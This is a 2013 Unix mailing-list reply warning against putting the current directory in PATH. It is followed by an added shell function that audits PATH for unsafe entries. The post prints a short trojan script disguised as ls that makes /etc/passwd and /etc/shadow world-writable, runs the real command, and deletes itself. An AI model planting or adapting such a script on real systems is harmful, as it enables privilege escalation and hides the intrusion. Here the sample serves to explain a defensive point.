executable from menu line

Bill Campbell bill at celestial.com
Mon Jun 10 10:11:16 PDT 2013


On Mon, Jun 10, 2013, Dennis Malen wrote:
>Between Ken and Bill, I was able to correct the silly mistake.

The really silly mistake is having the current directory in your
PATH as this is one of the oldest methods of cracking *nix
systems known.  All a cracker has to do is put a script in a
likely place, say /tmp/ls or $HOME/ls that will do nasties.
Something like this:

#!/bin/sh
me="$0"
progname=`basename $me`
# do something nasty
chmod 666 /etc/passwd /etc/shadow
# execute the real command
/bin/$progname "$@"
# remove the evidence
rm -rf $me

Bill
-- 
INTERNET:   bill at celestial.com  Bill Campbell; Celestial Software LLC
URL: http://www.celestial.com/  PO Box 820; 6641 E. Mercer Way
Voice:          (206) 236-1676  Mercer Island, WA 98040-0820
Fax:            (206) 232-9186  Skype: jwccsllc (206) 855-5792

You know the one thing that's wrong with this country? Everyone gets a
chance to have their fair say.  -- Bill Clinton, May 29, 1993, The White House
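
Added example, not part of the message above: a POSIX sh check for the PATH setting the post warns about. It reports entries that resolve to the current directory and, going one step beyond the post, absolute entries that any user can write to (such as /tmp). The function name audit_path and its output labels are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the original post): report PATH entries that let a
# file planted in the working directory or in a shared directory shadow a
# real command such as ls.

audit_path() (
    # $1 is the PATH string to audit; defaults to the live PATH.
    rest="${1-$PATH}:"      # extra ':' so the last field is seen, even if empty
    findings=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}   # first field
        rest=${rest#*:}     # everything after the first ':'
        case $entry in
            "")
                # An empty field (leading, trailing or doubled ':') means the
                # current directory, exactly like '.'.
                echo "current-dir: (empty field)"
                findings=$((findings + 1)) ;;
            /*)
                # Absolute entry: flag it if anyone may create files there.
                # In `ls -ld` output the 9th character is the other-write bit.
                [ -d "$entry" ] || continue
                case $(ls -ldL "$entry" 2>/dev/null) in
                    d???????w*)
                        echo "world-writable: $entry"
                        findings=$((findings + 1)) ;;
                esac ;;
            *)
                # '.', './bin', 'bin': all resolve against the working directory.
                echo "current-dir: $entry"
                findings=$((findings + 1)) ;;
        esac
    done
    # Exit status 0 only when nothing was reported.
    [ "$findings" -eq 0 ]
)

# Audit the PATH of the shell running this script.
audit_path "$PATH" || echo "PATH contains entries that should be removed" >&2
```

The function exits non-zero when it reports anything, so it can gate a login script or a configuration check.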

